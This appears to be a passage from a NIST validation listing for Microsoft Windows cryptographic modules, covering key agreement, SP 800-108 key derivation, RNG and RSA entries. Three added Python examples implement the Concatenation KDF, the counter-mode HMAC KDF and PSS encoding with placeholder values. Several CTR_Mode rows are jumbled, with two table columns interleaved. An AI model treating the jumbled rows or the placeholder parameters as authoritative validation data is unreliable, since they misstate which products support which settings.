  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS Val#3047, ECDSA Val#760, DRBG Val#955
Algorithm Implementation and Certificate #: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub Cryptography Next Generation (CNG) Implementations #72, Version 10.0.10586

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#2886, DSA Val#983, DRBG Val#868
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS Val#2886, ECDSA Val#706, DRBG Val#868
Algorithm Implementation and Certificate #: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 Cryptography Next Generation (CNG) Implementations #64, Version 10.0.10240

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#2373, DSA Val#855, DRBG Val#489
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS Val#2373, ECDSA Val#505, DRBG Val#489
Algorithm Implementation and Certificate #: Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 Cryptography Next Generation Cryptographic Implementations #47, Version 6.3.9600

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FA: SHA256 ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( KARole(s): Initiator / Responder ) ( FA: SHA256 ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FA: SHA256 HMAC ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS #1903, DSA Val#687, DRBG #258
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 ) ( ED: P-384 SHA384 ) ( EE: P-521 (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS #1903, ECDSA Val#341, DRBG #258
Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #36

Modes / States / Key Sizes: KAS (SP 800-56A) key agreement; key establishment methodology provides 80 to 256 bits of encryption strength
Algorithm Implementation and Certificate #: Windows 7 and SP1, vendor-affirmed; Windows Server 2008 R2 and SP1, vendor-affirmed
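Every KAS ECC row above names Concatenation as its KDF: the SP 800-56A single-step KDF that turns the shared secret Z produced by the Diffie-Hellman primitive into keying material by hashing a 32-bit counter, Z and an OtherInfo string. The script below is an added example for this page, not code from SymCrypt or the Virtual TPM modules, and uses only the Python standard library. Because the standard library has no ECC CDH primitive, the shared secret Z and the party identifiers are constructed sample values (in a real P-256/P-384/P-521 exchange Z is the x-coordinate of the CDH result); the OtherInfo layout AlgorithmID || PartyUInfo || PartyVInfo || SuppPubInfo || SuppPrivInfo follows the standard's concatenation format, with the field encodings and the AlgorithmID string chosen here as placeholders. It also shows why the Initiator and Responder roles in the table matter: Party U is always the initiator, so both sides assemble the same OtherInfo and derive the same key.

```python
"""SP 800-56A Concatenation KDF ("KDFs: Concatenation" in the KAS rows above).

Added example for this page, not Microsoft code. Standard library only; the
shared secret Z, party identifiers and AlgorithmID below are constructed
placeholders, and the OtherInfo field encoding is an application choice.
"""
import hashlib
import struct


def concat_kdf(z: bytes, keydatalen_bits: int, other_info: bytes,
               hash_name: str = "sha256") -> bytes:
    """Single-step KDF, hash option (SP 800-56A section 5.8.1).

    DerivedKeyingMaterial = H(1 || Z || OtherInfo) || H(2 || Z || OtherInfo) || ...
    with a 4-byte big-endian counter, truncated to keydatalen bits.
    """
    if keydatalen_bits <= 0 or keydatalen_bits % 8:
        raise ValueError("keydatalen must be a positive multiple of 8 bits")
    hash_len = hashlib.new(hash_name).digest_size
    reps = -(-keydatalen_bits // (8 * hash_len))       # ceil(keydatalen / hashlen)
    if reps >= 2 ** 32:
        raise ValueError("keydatalen too large for a 32-bit counter")
    out = bytearray()
    for counter in range(1, reps + 1):
        block = struct.pack(">I", counter) + z + other_info
        out += hashlib.new(hash_name, block).digest()
    return bytes(out[: keydatalen_bits // 8])


def other_info(algorithm_id: bytes, party_u: bytes, party_v: bytes,
               supp_pub: bytes = b"", supp_priv: bytes = b"") -> bytes:
    """OtherInfo = AlgorithmID || PartyUInfo || PartyVInfo || SuppPubInfo || SuppPrivInfo.

    Party U is the initiator and Party V the responder, so the byte string is
    identical on both sides no matter which of them is running this code.
    """
    return algorithm_id + party_u + party_v + supp_pub + supp_priv


def derive_for_role(role: str, z: bytes, my_id: bytes, peer_id: bytes,
                    bits: int = 256, hash_name: str = "sha256") -> bytes:
    """Derive keying material as the Initiator (Party U) or the Responder (Party V)."""
    if role == "Initiator":
        u, v = my_id, peer_id
    elif role == "Responder":
        u, v = peer_id, my_id
    else:
        raise ValueError("role must be 'Initiator' or 'Responder'")
    # "AES-256-GCM" is a placeholder AlgorithmID; the standard leaves its form open.
    return concat_kdf(z, bits, other_info(b"AES-256-GCM", u, v), hash_name)


if __name__ == "__main__":
    # Constructed Z; in practice it is the output of the ECC CDH primitive.
    z = bytes.fromhex("0f" * 32)
    k_initiator = derive_for_role("Initiator", z, b"alice", b"bob")
    k_responder = derive_for_role("Responder", z, b"bob", b"alice")
    print(k_initiator.hex(), k_initiator == k_responder)
```

The parameter sets in the table pair each curve with a hash (EC: SHA-256, ED: SHA-384, EE: SHA-512); pass the matching hash_name so the KDF's hash is at least as strong as the curve. Z must be zeroised once the derived key exists, and the derived bytes, not Z itself, are what become session keys.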

SP 800-108 Key-Based Key Derivation Functions (KBKDF)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

Modes / States / Key Sizes:
  Counter:
    MACs: HMAC-SHA-1, HMAC-SHA-256, HMAC-SHA-384
    MAC prerequisite: HMAC #3271
    Counter Location: Before Fixed Data
    R Length: 32 (bits)
    SPs used to generate K: SP 800-56A, SP 800-90A
    K prerequisite: DRBG #1734, KAS #150
Algorithm Implementation and Certificate #: Microsoft Surface Hub Virtual TPM Implementations #161, Version 10.0.15063.674

Modes / States / Key Sizes:
  Counter:
    MACs: HMAC-SHA-1, HMAC-SHA-256, HMAC-SHA-384
    MAC prerequisite: HMAC #3270
    Counter Location: Before Fixed Data
    R Length: 32 (bits)
    SPs used to generate K: SP 800-56A, SP 800-90A
    K prerequisite: DRBG #1733, KAS #149
Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #160, Version 10.0.16299

Modes / States / Key Sizes:
  Counter:
    MACs: CMAC-AES-128, CMAC-AES-192, CMAC-AES-256, HMAC-SHA-1, HMAC-SHA-256, HMAC-SHA-384, HMAC-SHA-512
    MAC prerequisite: AES #4902, HMAC #3269
    Counter Location: Before Fixed Data
    R Length: 32 (bits)
    SPs used to generate K: SP 800-56A, SP 800-90A
    K prerequisite: KAS #148
Algorithm Implementation and Certificate #: Microsoft Surface Hub Cryptography Next Generation (CNG) Implementations #159, Version 10.0.15063.674

Modes / States / Key Sizes:
  Counter:
    MACs: CMAC-AES-128, CMAC-AES-192, CMAC-AES-256, HMAC-SHA-1, HMAC-SHA-256, HMAC-SHA-384, HMAC-SHA-512
    MAC prerequisite: AES #4901, HMAC #3268
    Counter Location: Before Fixed Data
    R Length: 32 (bits)
    SPs used to generate K: SP 800-56A, SP 800-90A
    K prerequisite: KAS #147
Algorithm Implementation and Certificate #: Windows 10 Mobile (version 1709) Cryptography Next Generation (CNG) Implementations #158, Version 10.0.15254

Modes / States / Key Sizes:
  Counter:
    MACs: CMAC-AES-128, CMAC-AES-192, CMAC-AES-256, HMAC-SHA-1, HMAC-SHA-256, HMAC-SHA-384, HMAC-SHA-512
    MAC prerequisite: AES #4897, HMAC #3267
    Counter Location: Before Fixed Data
    R Length: 32 (bits)
    SPs used to generate K: SP 800-56A, SP 800-90A
    K prerequisite: KAS #146
Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Cryptography Next Generation (CNG) Implementations #157, Version 10.0.16299

CTR_Mode: ( Llength( Min0 Max0 ) MACSupported( Windows 10 Creators Update (version 1703) Pro,
[HMACSHA1] [HMACSHA256] [HMACSHA384] ) Enterprise, Education Virtual TPM Implementations #141
LocationCounter( [BeforeFixedData] ) rlength( [32] ) )
Version 10.0.15063
KAS Val#128
DRBG Val#1556
MAC Val#3062

CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Windows 10 Creators Update (version 1703) Home, Pro,
[CMACAES128] [CMACAES192] [CMACAES256] [HMACSHA1] Enterprise, Education, Windows 10 S, Windows 10 Mobile
[HMACSHA256] [HMACSHA384] [HMACSHA512] ) Cryptography Next Generation (CNG) Implementations
LocationCounter( [BeforeFixedData] ) rlength( [32] ) ) #140
KAS Val#127 Version 10.0.15063
AES Val#4624
DRBG Val#1555
MAC Val#3061
CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Microsoft Windows 10 Anniversary Update, Windows
[HMACSHA1] [HMACSHA256] [HMACSHA384] ) Server 2016, Windows Storage Server 2016; Microsoft
LocationCounter( [BeforeFixedData] ) rlength( [32] ) ) Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
10 Anniversary Update Virtual TPM Implementations
KAS Val#93 DRBG Val#1222 MAC Val#2661 #102
Version 10.0.14393

CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Microsoft Windows 10 Anniversary Update, Windows
[CMACAES128] [CMACAES192] [CMACAES256] Server 2016, Windows Storage Server 2016; Microsoft
[HMACSHA1] [HMACSHA256] [HMACSHA384] Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
[HMACSHA512] ) LocationCounter( [BeforeFixedData] ) w/ Windows 10 Anniversary Update; Microsoft Lumia 950
rlength( [32] ) ) and Lumia 650 w/ Windows 10 Mobile Anniversary
Update Cryptography Next Generation (CNG)
KAS Val#92 AES Val#4064 DRBG Val#1217 MAC Val#2651 Implementations #101
Version 10.0.14393

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” Cryptography Next Generation (CNG) Implementations #72
Version 10.0.10586
  CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( [CMACAES128] [CMACAES192] [CMACAES256] [HMACSHA1] [HMACSHA256] [HMACSHA384] [HMACSHA512] ) LocationCounter( [BeforeFixedData] ) rlength( [32] ) )
  Prerequisite: KAS Val#72, AES Val#3629, DRBG Val#955, MAC Val#2381

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 Cryptography Next Generation (CNG) Implementations #66
Version 10.0.10240
  CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( [CMACAES128] [CMACAES192] [CMACAES256] [HMACSHA1] [HMACSHA256] [HMACSHA384] [HMACSHA512] ) LocationCounter( [BeforeFixedData] ) rlength( [32] ) )
  Prerequisite: KAS Val#64, AES Val#3497, DRBG Val#868, MAC Val#2233

Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 Cryptography Next Generation Cryptographic Implementations #30
Version 6.3.9600
  CTR_Mode: ( Llength( Min0 Max0 ) MACSupported( [HMACSHA1] [HMACSHA256] [HMACSHA512] ) LocationCounter( [BeforeFixedData] ) rlength( [32] ) )
  Prerequisite: DRBG Val#489, MAC Val#1773

Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #3
  CTR_Mode: ( Llength( Min0 Max4 ) MACSupported( [HMACSHA1] [HMACSHA256] [HMACSHA512] ) LocationCounter( [BeforeFixedData] ) rlength( [32] ) )
  Prerequisite: DRBG #258, HMAC Val#1345
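The CTR_Mode entries above describe an SP 800-108 key-derivation function in counter mode: a 32-bit counter (rlength 32) placed before the fixed data (LocationCounter BeforeFixedData), an HMAC or CMAC PRF, and an L field carrying the requested output length (Llength; the Min0 Max0 entry is an implementation that omits L). The Python below is an added example written for this page, not Microsoft's CNG code: it implements the HMAC variant with the standard library and a constructed demo key. The 32-bit big-endian encoding of L is an assumption, since SP 800-108 leaves the width of L to the implementation; CMAC-AES is not shown because the standard library has no AES.

```python
import hashlib
import hmac


def kdf_ctr_hmac(key_in: bytes, label: bytes, context: bytes, out_bits: int,
                 hash_name: str = "sha256", r_len_bits: int = 32,
                 include_l: bool = True) -> bytes:
    """SP 800-108 KDF in counter mode with an HMAC PRF.

    Block i is PRF(K_in, [i]_r || Label || 0x00 || Context || [L]_32): the
    counter (r bits, big-endian) precedes the fixed data, matching the CAVP
    parameters LocationCounter(BeforeFixedData) and rlength(32).  The 32-bit
    width of L is an assumption (SP 800-108 leaves it to the implementation);
    include_l=False models the Llength(Min0 Max0) entry, which omits L.
    """
    if r_len_bits % 8 or not 8 <= r_len_bits <= 32:
        raise ValueError("counter width must be 8, 16, 24 or 32 bits")
    h_len = hashlib.new(hash_name).digest_size
    out_len = (out_bits + 7) // 8
    n_blocks = -(-out_len // h_len)                     # ceiling division
    if n_blocks > (1 << r_len_bits) - 1:
        raise ValueError("requested length exceeds the counter range")
    fixed = label + b"\x00" + context
    if include_l:
        fixed += out_bits.to_bytes(4, "big")
    out = b""
    for i in range(1, n_blocks + 1):
        block_in = i.to_bytes(r_len_bits // 8, "big") + fixed
        out += hmac.new(key_in, block_in, hash_name).digest()
    return out[:out_len]


def derive_pair(key_in: bytes, context: bytes) -> tuple:
    """Derive an encryption key and a MAC key from one master key; the
    distinct labels give domain separation, the usual SP 800-108 pattern."""
    enc_key = kdf_ctr_hmac(key_in, b"ENC", context, 256)
    mac_key = kdf_ctr_hmac(key_in, b"MAC", context, 256)
    return enc_key, mac_key


if __name__ == "__main__":
    master = bytes(range(32))        # constructed demo key, not a real secret
    enc, mac = derive_pair(master, b"session-42")
    print("enc", enc.hex())
    print("mac", mac.hex())
```

Because L is part of every block's input, asking for 256 bits and asking for 512 bits yield unrelated outputs even for the same key, label and context; with L omitted (the Min0 Max0 case) the 256-bit output is simply a prefix of the 512-bit one, so two callers that differ only in length would share key material.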

Random Number Generator (RNG)

Each entry lists the modes / states / key sizes, followed (indented) by the algorithm implementations and certificate numbers validated for them.

FIPS 186-2 General Purpose [ (x-Original); (SHA-1) ]
  Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #1110

FIPS 186-2 [ (x-Original); (SHA-1) ]
  Windows Embedded Compact 7 Enhanced Cryptographic Provider (RSAENH) #1060
  Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile Enhanced Cryptographic Provider (RSAENH) #292
  Windows CE and Windows Mobile 6.0 and Windows Mobile 6.5 Enhanced Cryptographic Provider (RSAENH) #286
  Windows CE 5.00 and Windows CE 5.01 Enhanced Cryptographic Provider (RSAENH) #66

FIPS 186-2 [ (x-Change Notice); (SHA-1) ]
  Windows 7 and SP1 and Windows Server 2008 R2 and SP1 RNG Library #649

FIPS 186-2 General Purpose [ (x-Change Notice); (SHA-1) ]
  Windows Vista Ultimate SP1 and Windows Server 2008 RNG Implementation #435
  Windows Vista RNG implementation #321

FIPS 186-2 General Purpose [ (x-Change Notice); (SHA-1) ]
  Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #470
  Windows XP Professional SP3 Kernel Mode Cryptographic Module (fips.sys) #449
  Windows XP Professional SP3 Enhanced Cryptographic Provider (RSAENH) #447
  Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #316
  Windows Server 2003 SP2 Kernel Mode Cryptographic Module (fips.sys) #313

FIPS 186-2 [ (x-Change Notice); (SHA-1) ]
  Windows XP Professional SP3 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #448
  Windows Server 2003 SP2 Enhanced DSS and Diffie-Hellman Cryptographic Provider #314

RSA

Each entry lists the algorithm implementation and certificate #, its version, and then (indented) the modes / states / key sizes.

Microsoft Surface Hub Virtual TPM Implementations #2677
Version 10.0.15063.674
  RSA 186-4:
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384; Mod 2048 SHA: SHA-1, SHA-256, SHA-384
  Signature Verification PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits)
  Prerequisite: SHS #4011, DRBG #1734

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #2676
Version 10.0.16299
  RSA 186-4:
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 240 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384; Mod 2048 SHA: SHA-1, SHA-256, SHA-384
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits)
  Prerequisite: SHS #4009, DRBG #1733

Microsoft Surface Hub RSA32 Algorithm Implementations #2675
Version 10.0.15063.674
  RSA 186-4:
  Key Generation:
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Prerequisite: SHS #4011, DRBG #1732

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); RSA32 Algorithm Implementations #2674
Version 10.0.16299
  RSA 186-4:
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Prerequisite: SHS #4009, DRBG #1730

Windows 10 Mobile (version 1709) RSA32 Algorithm Implementations #2673
Version 10.0.15254
  RSA 186-4:
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Prerequisite: SHS #4010, DRBG #1731
Microsoft Surface Hub MsBignum Cryptographic Implementations #2672
Version 10.0.15063.674
  RSA 186-4:
  Key Generation: Public Key Exponent: Fixed (10001); Provable Primes with Conditions: Mod lengths: 2048, 3072 (bits); Primality Tests: C.3
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 496 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Prerequisite: SHS #4011, DRBG #1732
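The PSS entries validate a salt length equal to the hash length for every modulus except one combination: Mod 1024 with SHA-512 is listed at a 496-bit salt (SaltLen( 62 ) in the CAVP notation used further down). That is not an implementation quirk but a bound from the EMSA-PSS encoding (RFC 8017 section 9.1): the encoded message has emLen = ceil((modBits - 1)/8) = 128 bytes, and emLen - hLen - 2 = 128 - 64 - 2 = 62 bytes is the largest salt that fits beside the 64-byte hash, the 0x01 separator and the trailing 0xBC. The Python below is an added example for this page, not code from any of the listed implementations: it implements EMSA-PSS-ENCODE and EMSA-PSS-VERIFY with MGF1 from the standard library and exposes the salt bound as a function. The RSA modular exponentiation is left out, because the bound is a property of the encoding alone; messages and salts are constructed test data.

```python
import hashlib
import hmac
import os


def _digest_len(hash_name: str) -> int:
    return hashlib.new(hash_name).digest_size


def mgf1(seed: bytes, mask_len: int, hash_name: str) -> bytes:
    """MGF1 (RFC 8017 B.2.1): Hash(seed || C) for C = 0, 1, ..., truncated."""
    out = b""
    counter = 0
    while len(out) < mask_len:
        out += hashlib.new(hash_name, seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:mask_len]


def em_len_for(mod_bits: int) -> int:
    """emLen = ceil(emBits / 8) with emBits = modBits - 1 (RFC 8017 8.1.1)."""
    return (mod_bits - 1 + 7) // 8


def max_salt_len(mod_bits: int, hash_name: str) -> int:
    """Largest salt (bytes) the encoding can hold: emLen - hLen - 2.
    A 1024-bit modulus with SHA-512 gives 128 - 64 - 2 = 62 bytes = 496 bits."""
    return em_len_for(mod_bits) - _digest_len(hash_name) - 2


def pss_encode(message: bytes, mod_bits: int, hash_name: str, salt: bytes) -> bytes:
    """EMSA-PSS-ENCODE (RFC 8017 9.1.1); returns EM, emLen bytes long."""
    em_bits = mod_bits - 1
    em_len = em_len_for(mod_bits)
    h_len = _digest_len(hash_name)
    if len(salt) > max_salt_len(mod_bits, hash_name):
        raise ValueError("encoding error: salt too long for this modulus and hash")
    m_hash = hashlib.new(hash_name, message).digest()
    h = hashlib.new(hash_name, b"\x00" * 8 + m_hash + salt).digest()
    db = b"\x00" * (em_len - len(salt) - h_len - 2) + b"\x01" + salt
    db_mask = mgf1(h, em_len - h_len - 1, hash_name)
    masked_db = bytearray(a ^ b for a, b in zip(db, db_mask))
    # Clear the leftmost 8*emLen - emBits bits so that EM < 2^emBits.
    masked_db[0] &= 0xFF >> (8 * em_len - em_bits)
    return bytes(masked_db) + h + b"\xbc"


def pss_verify(message: bytes, em: bytes, mod_bits: int, hash_name: str,
               salt_len: int) -> bool:
    """EMSA-PSS-VERIFY (RFC 8017 9.1.2) for a fixed expected salt length."""
    em_bits = mod_bits - 1
    em_len = em_len_for(mod_bits)
    h_len = _digest_len(hash_name)
    if len(em) != em_len or salt_len > max_salt_len(mod_bits, hash_name):
        return False
    if em[-1] != 0xBC:
        return False
    masked_db, h = em[: em_len - h_len - 1], em[em_len - h_len - 1 : -1]
    top_bits = 8 * em_len - em_bits
    if top_bits and masked_db[0] >> (8 - top_bits):
        return False                    # leftmost bits must already be zero
    db_mask = mgf1(h, em_len - h_len - 1, hash_name)
    db = bytearray(a ^ b for a, b in zip(masked_db, db_mask))
    db[0] &= 0xFF >> top_bits
    ps_len = em_len - h_len - salt_len - 2
    if any(db[:ps_len]) or db[ps_len] != 0x01:
        return False
    salt = bytes(db[ps_len + 1 :])
    m_hash = hashlib.new(hash_name, message).digest()
    expected = hashlib.new(hash_name, b"\x00" * 8 + m_hash + salt).digest()
    return hmac.compare_digest(expected, h)


if __name__ == "__main__":
    msg = b"constructed message"            # constructed test input
    em = pss_encode(msg, 2048, "sha256", os.urandom(32))
    print("2048/SHA-256 round trip:", pss_verify(msg, em, 2048, "sha256", 32))
    print("max salt, 1024/SHA-512:", max_salt_len(1024, "sha512") * 8, "bits")
```

Verification with a fixed salt length, as above, is what the CAVP Sig(Ver) entries test; a verifier that instead recovers the salt length from the padding (sLen "auto") accepts any salt the encoding can hold, which is why the two settings are not interchangeable when checking interoperability.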
Microsoft Surface Hub SymCrypt Cryptographic Implementations #2671
Version 10.0.15063.674
  RSA 186-4:
  Key Generation: Probable Random Primes: Mod lengths: 2048, 3072 (bits); Primality Tests: C.2
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Generation PSS:
